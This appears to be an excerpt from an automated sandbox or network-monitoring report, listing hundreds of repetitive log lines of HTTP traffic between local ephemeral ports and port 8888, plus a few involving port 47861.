Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 47861
Source: unknown	Network traffic detected: HTTP traffic on port 47861 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 47861 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 8888
